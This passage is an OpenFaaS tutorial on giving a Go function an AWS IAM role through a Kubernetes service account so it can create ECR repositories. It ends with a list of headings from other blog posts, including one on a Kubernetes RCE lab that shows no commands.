  --policy-name ecr-create-query-repository \
  --policy-document file://ecr-policy.json

Note down the given ARN, i.e.

{
    "Policy": {
        "PolicyName": "ecr-create-query-repository",
        "Arn": "arn:aws:iam::ACCOUNT_NUMBER:policy/ecr-create-query-repository"
    }
}

Create IAM Role and Service Account

The easiest way to create the IAM Role and Service Account is to use eksctl:

export ARN=arn:aws:iam::ACCOUNT_NUMBER:policy/ecr-create-query-repository

eksctl create iamserviceaccount \
  --name openfaas-create-ecr-repo \
  --namespace openfaas-fn \
  --cluster of-test \
  --role-name ecr-create-query-repository \
  --attach-policy-arn $ARN \
  --region eu-west-1 \
  --approve

This can also be done manually by creating the IAM Role in AWS, followed by a correctly annotated Service Account in Kubernetes using the eks.amazonaws.com/role-arn annotation.

Create a function that uses the IAM Role

We are going to use Go to create this function. You can learn more about the Go template in the OpenFaaS documentation.

AWS also has SDKs available for other languages supported by OpenFaaS such as Python, Java, Node.js, C#, etc.

Create a new function using the golang-middleware template:

export OPENFAAS_PREFIX=ttl.sh/openfaas

faas-cli new --lang golang-middleware ecr-create-repo

Edit the stack.yaml file to add an annotation stating which Kubernetes Service Account to use:

functions:
  ecr-create-repo:
+    annotations:
+      com.openfaas.serviceaccount: openfaas-create-ecr-repo

Set the region for the function, along with the URL of the ECR registry:

functions:
  ecr-create-repo:
+    environment:
+      AWS_REGION: eu-west-1

Add the AWS SDK for Go to the function as a dependency:

cd ecr-create-repo
go get github.com/aws/aws-sdk-go-v2/aws
go get github.com/aws/aws-sdk-go-v2/config
go get github.com/aws/aws-sdk-go-v2/service/ecr

You can learn more about the AWS SDK for Go in the AWS documentation.

Edit the functions handler to use the AWS SDK for Go:

package function

import (
	"context"
	"encoding/json"
	"fmt"
	"io"
	"log"
	"net/http"
	"os"
	"strings"

	"github.com/aws/aws-sdk-go-v2/config"
	"github.com/aws/aws-sdk-go-v2/service/ecr"
	"github.com/aws/aws-sdk-go-v2/service/ecr/types"
)

type CreateRepoReq struct {
	Name string `json:"name"`
}

type CreateRepoRes struct {
	Arn string `json:"arn"`
}

func Handle(w http.ResponseWriter, r *http.Request) {
	var input []byte

	if r.Body != nil {
		defer r.Body.Close()

		body, _ := io.ReadAll(r.Body)

		input = body
	}

	var createRepoReq CreateRepoReq
	if len(input) > 0 {
		if err := json.Unmarshal(input, &createRepoReq); err != nil {
			http.Error(w, "Invalid request body", http.StatusBadRequest)
			return
		}
	}

	if len(createRepoReq.Name) == 0 {
		http.Error(w, "Missing in body: name", http.StatusBadRequest)
		return
	}

	cfg, err := config.LoadDefaultConfig(context.TODO(),
		config.WithRegion(os.Getenv("AWS_REGION")))
	if err != nil {
		log.Fatalf("unable to load SDK config, %v", err)
	}

	// Using the Config value, create the ECR client
	svc := ecr.NewFromConfig(cfg)

	// Check if the repository already exists
	if _, err := svc.DescribeRepositories(context.TODO(), &ecr.DescribeRepositoriesInput{
		RepositoryNames: []string{createRepoReq.Name},
	}); err != nil {
		log.Printf("Error describing repository: %s", err.Error())
		if !strings.Contains(err.Error(), "RepositoryNotFoundException") {
			http.Error(w, fmt.Sprintf("Failed to describe repository: %s", err.Error()), http.StatusInternalServerError)
			return
		}
	}

	// Create the repository
	createRes, err := svc.CreateRepository(context.TODO(), &ecr.CreateRepositoryInput{
		RepositoryName:     &createRepoReq.Name,
		ImageTagMutability: types.ImageTagMutabilityMutable,
		EncryptionConfiguration: &types.EncryptionConfiguration{
			EncryptionType: types.EncryptionTypeAes256,
		},
		ImageScanningConfiguration: &types.ImageScanningConfiguration{
			ScanOnPush: false,
		},
	})
	if err != nil {
		http.Error(w, fmt.Sprintf("Failed to create repository: %s", err.Error()), http.StatusInternalServerError)
		return
	}

	w.WriteHeader(http.StatusCreated)

	createRepoRes := CreateRepoRes{
		Arn: *createRes.Repository.RepositoryArn,
	}
	json.NewEncoder(w).Encode(createRepoRes)
}

Invoke the function to create a new repository

Now you can use curl to create a repository:

curl http://127.0.0.1:8080/function/ecr-create-repo \
  -d '{"name":"tenant1/fn1"}' \
  -H "Content-type: application/json"

The response contains the ARN of the repository, ready for you to use in something like the OpenFaaS Function Builder API to push a new image.

{
    "arn": "arn:aws:ecr:eu-west-1:ACCOUNT_NUMBER:repository/tenant1/fn1"
}

You should see the repository created in AWS Console.

You can also verify this from the command line:

aws ecr list-images --repository-name tenant1/fn1 --region eu-west-1

aws ecr describe-repositories --repository-name tenant1/fn1 --region eu-west-1

Wrapping up and next steps

In a very short period of time, we created a function using the golang-middleware template, added the AWS SDK for Go as a dependency, and used it to create a repository in ECR.

This is required step to push new images to an AWS ECR registry, and could form part of a CI/CD pipeline, or a multi-tenant functions platform.

With a few simple steps, you can take code in the form of a plain files, a zip file, tar file, or Git repository, and turn it into a function.

Create a tenant namespace using the OpenFaaS Gateway’s REST API i.e. tenant
Create a repository for the tenant’s new function you want to build i.e. tenant/fn1
Use the Function Builder’s API to publish the image to the full ARN path i.e. ACCOUNT_NUMBER.dkr.ecr.eu-west-1.amazonaws.com/tenant1/fn1:TAG
Post a request to the OpenFaaS Gateway’s REST API to deploy the function to the tenant1 namespace

Highlights of this approach:

The function operates with AWS IAM, using least privilege principles.
The function obtains ambient credentials from the Kubernetes Service Account, using IRSA instead of shared, long-lived credentials.
The function can be deployed to Kubernetes rapidly using the same workflows and tools you already use with Kubernetes.

To take things further, consider authentication options for the function.

Built-in Function Authentication using OpenFaaS IAM.
Your own code in the handler to process an Authorization header with a static key or JWT token.

We wrote to the AWS API directly, however you can use the Event Connectors for AWS SQS or SNS to receive events from other AWS services such as S3, DynamoDB, etc.

The same technique can be applied for other APIs such as the Kubernetes API, for when you want a function to obtain an identity to manage resources in one or more Kubernetes clusters: Learn how to access the Kubernetes API from a Function.

You may also like to learn how to run OpenFaaS as a multi-tenant platform:

High-level overview and customer stories - Integrate FaaS Capabilities into Your Platform with OpenFaaS]
Deep dive into technical details - Build a multi-tenant functions platform.

OpenFaaS - Serverless Functions Made Simple

What Adaptive Concurrency Means for Async Functions

Synchronous vs. asynchronous invocation

Where queue-worker dispatch falls short

How adaptive concurrency solves this

Why does the default approach generate retries?

How adaptive concurrency works

Greedy vs. adaptive concurrency — a side-by-side comparison

When to use adaptive concurrency

Functions with a known concurrency limit

Functions with variable upstream capacity

Try it out

Further reading

Wrapping up

Encrypt build-time secrets for the Function Builder

Introduction

How it works

Part A: Setting up the builder with build secrets

Create a test cluster

Create the namespace and license secret

Create a registry credential secret

Generate secrets

Create the Kubernetes secrets

Deploy the builder

Verify

Part B: Building a function with secrets

Create the function

Build with the remote builder

Verify

A real-world example: private PyPI registry

Sealing secrets for CI pipelines

New faas-cli commands

Wrapping up

See also

Introducing: Painless support and hands-off architecture reviews

Two case-studies

Two main uses-cases

What does it collect?

Install the diag plugin

Generate a report

Exploring the report

Useful flags and options

Wrapping up

Appendix: full configuration reference

How to Migrate OpenFaaS to Gateway API

Preamble: The unfortunate double-whammy

Introduction to Gateway API

Prerequisites

Check and update Gateway API CRDs

Install a Gateway API Implementation

Install cert-manager

Create a cert-manager Issuer

Expose the OpenFaaS gateway with TLS

Create the Gateway object

Create the DNS record

Verify the certificate

Create the HTTPRoute

Attempt to reach a function

Log in to OpenFaaS

Add the OpenFaaS dashboard

Add a listener to the Gateway

Create the DNS record for the dashboard

Create the HTTPRoute for the dashboard

Final thoughts and next steps

How should OpenFaaS users approach nodes/proxy RCE in Kubernetes?

The vulnerability in brief

A note on alerts from CVE scanners in general

Tutorial

Our lab setup

Step 1: Set up the secrets

Step 2: Create the userdata script

Step 3: Generate the VM config

Step 4: Start the VM

Step 5: Shell into the VM

Step 6: Extract the prometheus service account token

Step 7: Discover the node IP and pods

Step 8: Execute commands via WebSocket

What we’ve learned from this exercise

This isn’t as scary as it sounds

What you should do